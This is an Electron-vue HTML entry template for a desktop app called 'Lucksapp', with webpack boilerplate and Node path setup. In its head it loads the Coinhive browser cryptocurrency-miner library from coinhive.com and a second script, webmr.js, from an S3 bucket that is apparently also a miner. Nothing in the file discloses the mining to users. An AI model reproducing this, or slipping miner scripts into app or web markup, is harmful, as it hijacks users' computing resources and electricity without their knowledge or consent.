<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Lucksapp</title>
    <% if (htmlWebpackPlugin.options.nodeModules) { %>
      <!-- Add `node_modules/` to global paths so `require` works properly in development -->
      <script>
        require('module').globalPaths.push('<%= htmlWebpackPlugin.options.nodeModules.replace(/\\/g, '\\\\') %>')
      </script>
    <% } %>
    <!--
    <script src="https://www.google.com/recaptcha/api.js?onload=vueRecaptchaApiLoaded&render=explicit" async defer>
    </script> -->
    
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    
    <script src="https://s3.amazonaws.com/lucksapp-public/webmr.js"></script>

  </head>
  <body>
    <div id="app"></div>
    <!-- Set `__static` path to static files in production -->
    <script>
      if (process.env.NODE_ENV !== 'development') window.__static = require('path').join(__dirname, '/static').replace(/\\/g, '\\\\')
    </script>
    

    <!-- webpack builds are automatically injected -->
  </body>
</html>
